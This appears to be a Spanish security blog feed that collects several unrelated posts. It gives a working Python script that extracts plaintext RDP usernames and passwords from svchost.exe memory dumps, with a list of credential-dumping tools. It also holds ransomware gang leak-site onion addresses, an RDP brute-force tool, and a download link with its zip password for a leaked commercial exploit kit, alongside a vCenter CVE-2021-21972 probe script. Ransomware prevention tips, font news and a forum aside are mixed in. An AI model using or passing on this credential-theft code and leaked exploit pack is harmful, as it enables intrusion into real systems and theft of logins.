Es posible extraer credenciales (usuario y contraseña) de inicio de sesión en texto plano en Windows escritorio remoto (RDP) del proceso de svchost.exe

Así lo ha descubierto el investigador Jonas, famoso recientemente por descubrir dos bugs (errores) en el sistema de archivos NTFS

Error en Windows 10 corrompe tu disco duro al ver el ícono un archivo
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html


Una simple búsqueda de cadena dentro de la memoria del proceso para svchost.exe revela la contraseña de texto sin formato que se utilizó para conectarse al sistema a través de RDP.

- La contraseña de texto sin formato está presente. La mayoría de los sistemas Windows modernos ya no tienen wdigest habilitado, por lo que encontrar credenciales de texto sin formato en la memoria es mucho más raro.
- La contraseña está en svchost.exe, a diferencia de lsass.exe. Esto significa que es posible que las herramientas defensivas para detectar / evitar el volcado de contraseñas de la memoria no puedan detectar esto.

Probé esto varias veces, así como muchas otras, y hasta ahora he observado lo siguiente:

- Esto parece funcionar en Windows 10, Windows Sever 2016, Windows Server 2012. Probablemente también en otros, pero hasta ahora lo he visto exitoso contra ellos.
- Según el autor del tweet y otros evaluadores, parece funcionar para cuentas locales y de dominio.
- No parece ser consistente. A veces, la contraseña está ahí, a veces no. No sé exactamente por qué es así. Parece existir en la memoria durante un largo período de tiempo, pero se desconoce cuánto tiempo.


Encuentra el proceso correcto. He visto algunas formas de hacerlo.

    Utilizando la herramienta Process Hacker 2. Ves a la pestaña Red y busca el proceso que tiene una conexión RDP. Esto solo funciona si la conexión RDP aún está activa.




Visto en:
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

El creador de la conocida herramienta mimikatz ha añadido recientemente la funcionalidad:





2.2.0 20210517 Terminal Server Passwords
https://github.com/gentilkiwi/mimikatz/releases

Mitigaciones:

Protect Remote Desktop credentials with Windows Defender Remote Credential Guard
https://docs.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard

Windows Defender Credential Guard: Requirements
https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements


Script Python
RDP_clear.py
https://gist.github.com/k4nfr3/ca2c392572da645661b62f9a71f28ba3

import re
from collections import namedtuple
import sys
 
# Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
# borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
# code inspired by  @gentilkiwi 's video
# This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
# I'm no dev so PR and constructive remarks are welcome
 
 
ASCII_BYTE = rb" !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t"
 
RDP_Strings = ['RDPDD', 'RDV::RDP::NetDetect::BandwidthChange']  #Server 2008 and Server 2016 tested only
 
String = namedtuple("String", ["s", "offset"])
 
 
def ascii_strings(buf, n=4):
    reg = rb"([%s]{%d,})" % (ASCII_BYTE, n)
    ascii_re = re.compile(reg)
    for match in ascii_re.finditer(buf):
        yield String(match.group().decode("ascii"), match.start())
 
def unicode_strings(buf, n=4):
    reg = rb"((?:[%s]\x00){%d,})" % (ASCII_BYTE, n)
    uni_re = re.compile(reg)
    for match in uni_re.finditer(buf):
        try:
            yield String(match.group().decode("utf-16"), match.start())
        except UnicodeDecodeError:
            pass
 
 
def getdomain(buf):
    return buf.decode("UTF-16)")
 
def banner():
    print(' _____ ____  _____           _             ')
    print('| __  |    \|  _  |      ___| |___ ___ ___ ')
    print('|    -|  |  |   __|     |  _| | -_| .\'|  _|')
    print('|__|__|____/|__|   _____|___|_|___|__,|_|  ')
    print('                  |_____|                  ')
 
 
 
def main():
    import sys
 
    SVCHOST = False
    Last1 = ""
    Last2 = ""
    Last3 = ""
    SERVERNAME=""
    with open(sys.argv[1], 'rb') as f:
        b = f.read()
 
    for s in ascii_strings(b, n=4):
        if format(s.s).find("svchost.exe -k termsvcs")!=-1:
            print('[*] Analyse of dump of process : {:s}'.format( s.s))
            SVCHOST = True
        if format(s.s).find("COMPUTERNAME=")!=-1:
            #print('[+] SERVERNAME : ' +s.s[13:])
            SERVERNAME=s.s[13:]
            break
 
    if (SVCHOST):
        print("\n")
        for s in unicode_strings(b):
            #print('[+] {:d} 0x{:d}: {:s}'.format(0,s.offset, s.s))
 
            if s.s in RDP_Strings:
                if (s.offset - Last1.offset) < 3000:
                    if (Last1.offset-Last2.offset==512):
                        #print('[+] User :{:d} 0x{:d}: {:s}'.format((s.offset - Last2.offset), Last2.offset, Last2.s))
                        print('[+] User : \t{:s}'.format(Last2.s))
                        #print('[+] Password : {:d} 0x{:d}: {:s}'.format((s.offset - Last1.offset), Last1.offset, Last1.s))
                        print('[+] Password : \t{:s}'.format(Last1.s))
                        if ((Last2.offset-Last3.offset) == 512) :
                            print('[+] Domain : \t{:d} 0x{:d}: {:s}'.format((s.offset - Last3.offset), Last3.offset, Last3.s))
                            break
                        else:
                            # bug in case string is less than 4 char
                            domain = b[Last2.offset-512:Last2.offset]
                            if getdomain(domain).strip('\x00')!="":
                                print('[+] Domain : \t{:s}'.format(getdomain(domain)))
                            else:  # can be empty, then it's local
                                print("[+] ServerName : \t"+SERVERNAME)
                            break
 
            Last3=Last2
            Last2=Last1
            Last1=s
 
    else:
        print(sys.argv[1] + " doesn't seem to be a svchost dump file")
 
 
if __name__ == "__main__":
    banner()
    if len(sys.argv) != 2:
        print("\n\nDump svchost process which listens to port 3389 port with any procdump tool")
        print("")
        print("Usage: " + sys.argv[0] + " svchost.dmp")
        exit(0)
    main()
 

Otras herramientas extracción credenciales en Windows

- mimikatz https://github.com/gentilkiwi/mimikatz
- Proyecto LaZagne https://github.com/AlessandroZ/LaZagne/
- Pypykatz (mimikatz) en Python https://github.com/skelsec/pypykatz
- Nishang (PowerShell) https://github.com/samratashok/nishang
- CrackMapExec CME https://github.com/byt3bl33d3r/CrackMapExec

¿Cuál es la manera más efectiva de proteger tu empresa contra un ataque de Ransomware?

Las lista de empresas afectadas cada día es más importante y grande:

El Sepe (Servicio de Empleo Publico Estatal de España , Adif, Acer,  Finsa, The Phone House, los Houston Rockets , Kia Motors, Whirlpool, Ayuntamientos, Ciudades, Departamentos de Policía. Hospitales, SegurCaixa Adeslas, Mapfre, Canon, Garmin, Orange, LG, Cadena Ser, Everis, Boeing,

Consejo profesional ¿cómo nos protegemos del ransomware?

- Instalar el teclado ruso en Windows en Windows (agregar) (No tienes que usarlo)
- Muchos ransomware no se iniciarán en sistemas en los que estén instalados ciertos teclados cirílicos
- Probablemente se la solución más simple pero efectiva de todas.

Añadir teclado Ruso vía registro:
https://github.com/Unit221B/Russian

https://twitter.com/elhackernet/status/1392229408992268292

No es una idea precisamente nueva:

Por ejemplo dicen que es exactamente lo primero que hace MinervaLabs para prevenir ataques de Ransomware

https://twitter.com/bry_campbell/status/1228288875799498753

https://twitter.com/briankrebs/status/1392163072970829830

Rusia y su relación con el ransomware
https://blog.elhacker.net/2021/04/rusia-y-su-relacion-conexion-el-ransomware.html

Otra idea igual de tonta, simple pero efectiva es hacer ver que tu sistema es una máquina virtual. Muchos ransomware hacen comprobaciones para ver que no estén siendo analizados de manera que si detecta que es una máquina virtual detiene el proceso.

https://github.com/d4rksystem/VMwareCloak

Lógicamente si la medida se hace popular, pues los autores de ransomware harán otro tipo de comprobaciones y no servirá de nada.

La manera más "lógica" a priori de saber si un dispositivo pertenece a Rusia es mirar la dirección IP, pero es mucho más fiable el teclado. Todos los trabajadores rusos que usen una VPN con una IP de otro país no serían detectados.

Consejos tradicionales

- Securizar RDP - Remote Desktop Protocol
- Segmentar la red - Segmentación de la red
- Cómo protegerse Ransomware de forma gratuita con Windows 10 con Windows Defender
- Herramientas específicas de protección (Anti-Ransom) Raccine
- Desactivar Windows Script Host
- Desactivar macros Microsoft Office
- Deshabilitar Powershell


Fuente:
Medidas prevención para evitar que un ransomware secuestre tu empresa
https://blog.elhacker.net/2021/03/medidas-prevencion-para-evitar-que-un-ransomware-cifre-tu-empresa.html

Medidas prevención ataques de ransomware

1- Segmentar la red
2- Control tráfico entrada-salida
3- Actualizar
4-  Copias de seguridad
5- Acceso remoto limitado
6- Contraseñas texto plano
7-  Cifrado
8- Wifi invitados
9- IDS/IPS
10- Denunciar
11- Bloquear macros Office

Fuente:
https://glider.es/las-10-claves-del-exito/

Han pasado 15 años desde que Calibri sustituyó a Times New Roman y Arial como la fuente predeterminada de Word, PowerPoint, Outlook y Excel. Ahora Microsoft ha encargado cinco nuevas tipografías sans serif para acabar con el reinado de Calibri, y está pidiendo ayuda a los usuarios para decidirse por una.






Microsoft ha comenzado a recopilar hoy mismo comentarios sobre las cinco nuevas fuentes, y planea establecer una de ellas como la tipografía predeterminada de Office a partir de 2022. Las cinco fuentes son:

    Bierstadt: creada por Steve Mattison, está inspirada en las tipografías suizas de mediados del siglo XX como la famosa Helvetica, con cortes claros en las terminaciones de los trazos, pero con un suavizado sutil para evitar la rigidez de los caracteres.
    Grandview: creada por Aaron Bell, se inspira en las señales de las carreteras y los ferrocarriles alemanes, diseñados para ser muy legibles, con algunos ajustes para que resulte cómoda la lectura de formatos largos.
    Seaford: creada por Tobias Frere-Jones, Nina Stössinger y Fred Shallcrass, reimagina las clásicas tipografías con serifas en un formato sans serif que resulta familiar y al mismo tiempo confortable para textos largos.
    Skeena: creada por John Hudson y Paul Hanslow, parece inspirada en fuentes de distintas épocas por sus grandes variaciones entre las partes gruesas y delgadas de sus caracteres, así como por las llamativas curvas de letras como la S, la A y la J.
    Tenorite: creada por Erin McLaughlin y Wei Huang, tiene el estilo más tradicional de las cinco, como una versión modernizada de la Times New Roman con caracteres anchos y signos de puntuación muy claros.

https://twitter.com/Microsoft/status/1387421368581455874

Un pequeño homenaje a todas las mujeres que han pasado por el foro, que no han sido muchas las que han reconocido ser mujeres.

- Gabirela
-  Constance
- Imoen
- Tifa (Marian Lander)
- Ap0
- Fulgencia
- Yasmesita

Dark Web

    AKO (RANZY): http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion
    AVADDON: http://avaddongun7rngel.onion
    BABYK: http://gtmx56k4hutn3ikv.onion
    CLOP: http://ekbgzchl6x2ias37.onion
    CUBA: http://cuba4mp6ximo2zlo.onion
    DARKSIDE: http://darksidedxcftmqa.onion
    DOPPLE PAYMER: hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion
    EGREGOR: http://egregoranrmzapcv.onion
    MOUNT LOCKER: http://mountnewsokhwilx.onion
    NEFILM (Corporate Leaks): http://hxt254aygrsziejn.onion
    PAY2KEY: http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion
    RAGNAR : http://p6o7m73ujalhgkiv.onion
    RANZYLEAK / AKO: http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion/
    RANSOMEXX (DEFRAY777): http://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion
    REVIL: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion
    SUNCRYPT: http://nbzzb6sa6xuura2z.onion

FUERA DE LÍNEA (20/02/2021)

    CONTI : htcltkjqoitnez5slo7fvhiou5lbno5bwczu7il2hmfpkowwdpj3q2yd.onion
    CONTI-NEWS (RYUK): http://fylszpcqfel7joif.onion
    EVEREST: http://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onion/
    HADES: http://ixltdyumdlthrtgx.onion
    LOCKBIT: http://lockbit-blog.com
    MAZE : xfr3txoorcyy7tikjgj5dk3rvo3vsrpyaxnclyohkbfp3h277ap4tiad.onion
    MAZE-NEWS: https://mazenews.online
    NETWALKER: http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion/blog
    PROLOCK: msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion
    PYSA : http://wqmfzni2nvbbpk25.onion/partners.html
    SEKHMET: http://sekhmetleaks.top
    XINOF - RAAS (Login required): wj3b2wtj7u2bzup75tzhnso56bin6bnvsxcbwbfcuvzpc4vcixbywlid.onion



Fuente:
https://www.hackplayers.com/2021/02/sitios-cibercriminales-deepweb.html

Offensive Wifi Toolkit  - Kit de herramientas Wifi ofensivo (owt)



Utiliza aircrack-ng y mdk3



Puede ser usado en kali



- No funciona con todos los adaptadores Wifi USB ni en máquinas virtuales (VM)

Repositorio GitHub
https://github.com/clu3bot/OWT

Lazy-RDP es una herramienta de escaneo y para realizar ataques de fuerza bruta junto con hydra (con diccionarios)  al Escritorio Remoto de Windows (#RDP) Puerto 3389

https://github.com/getdrive/Lazy-RDP

Permite escanear rangos con nmap o Masscan








Diccionarios  - WordLists
https://ns2.elhacker.net/wordlists/

https://github.com/emadshanab/Huge_DIR_wordlist

Se ha filtrado Immunity CANVAS 7.26 kit exploits.



Más de 800 exploits incluyendo exploit spectre

Se filtró en RaidForums

Incluye White Phosphorus & D2 exploit pack


Funciona en:

    Linux

        Fedora 24-27

        CentOS (disabled)

        Arch Linux (disabled)

        Debian (disabled)

        Ubuntu (14.04-18.10)

    Windows

        Windows 7

        Windows 8.1

        Windows 10 (disabled)

        Windows 2008

        Windows 2012

        Windows 2016 (disabled)

Descarga:
Immunity Canvas 7.26 + White Phosphorus Exploit Pack 1.28 + D2 Exploitation Pack 2.51
https://mega.nz/file/xOgGyAIC#5ZoiK4LmNHVb3ENac3Putve8C6wi6jvCM6qEmebzsXk

Password Zip:
99z1366BB89333cza@@@#13!

Fuente:
https://github.com/alt3kx/CVE-2021-21972

description = [[
VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability
 
This script looks the existence of CVE-2021-21972 based on the following PATH
"/ui/vropspluginui/rest/services/uploadova" trough a POST request and looking in 
response body (500) the words "uploadFile",that means the vCenter is avaiable 
to accept files via POST without any restrictions
 
Manual inspection: 
# curl -i -s -k -X $'GET' 
-H $'Host: <target>' 
-H $'User-Agent: alex666'
$'https://<target>/ui/vropspluginui/rest/services/getstatus'
 
# curl -i -s -k -X $'GET' 
-H $'Host: <target>' 
-H $'User-Agent: alex666'$'https://<target>/ui/vropspluginui/rest/services/uploadova'
 
# curl -i -s -k -X $'POST' 
-H $'Host: <target>' 
-H $'User-Agent: alex666' 
-H $'Content-Type: application/x-www-form-urlencoded' 
-H $'Content-Length: 0' $'https://<target>/ui/vropspluginui/rest/services/uploadova'
 
References: 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972'
https://www.vmware.com/security/advisories/VMSA-2021-0002.html
]]
 
---
-- @usage
-- nmap -p443 --script CVE-2021-21972.nse <target>
-- @output
-- PORT    STATE SERVICE
-- 443/tcp open  https
-- | CVE-2021-21972: 
-- |   VULNERABLE:
-- |   vCenter 6.5-7.0 RCE
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2021-21972
-- |       The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. 
-- |       A malicious actor with network access to port 443 may exploit this issue to execute commands with 
-- |       unrestricted privileges on the underlying operating system that hosts vCenter Server.
-- |     Disclosure date: 2021-02-23
-- |     References:
-- |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972
 
 
author = "Alex Hernandez aka alt3kx <alt3kx@protonmail.com>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit"}
 
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
 
portrule = shortport.http
 
action = function(host, port)
 
    local vuln = {
        title = "vCenter 6.5-7.0 RCE",
        state = vulns.STATE.NOT_VULN,
        IDS = { CVE = 'CVE-2021-21972' },
		description = [[
The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. 
A malicious actor with network access to port 443 may exploit this issue to execute commands with 
unrestricted privileges on the underlying operating system that hosts vCenter Server.]], 
 
		references = {
           'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972'
       },
       dates = {
           disclosure = {year = '2021', month = '02', day = '23'},
       },
 
    }   
 
    local report = vulns.Report:new(SCRIPT_NAME, host, port)
 
    local uri = "/ui/vropspluginui/rest/services/uploadova"
 
    local options = {header={}}
    options['header']['User-Agent'] = "Mozilla/5.0 (compatible; vCenter)"
 
    local response = http.post(host, port, uri)
 
    if ( response.status == 500 ) then
 
    local title = string.match(response.body, "uploadFile")
 
        if (title == "uploadFile") then
        	vuln.state = vulns.STATE.EXPLOIT
        else 
      		vuln.state = vulns.STATE.NOT_VULN
      	end 
 
    end
 
    return report:make_output (vuln)
end
 
 

¿Hay alguna manera fácil para que las mencionadas carpetas (Adobe Premiere Pro Preview Files) y Adobe Premiere Pro Auto-Save no ocupen un tamaño desorbitado?

No conozco nada la herramienta Adrobe Premiere Pro, pero veo que las carpetas

Intentaré desactivar el autoguardado, porque las susodicha carpetas ya ocupan 368GB y tampoco hay natos videos: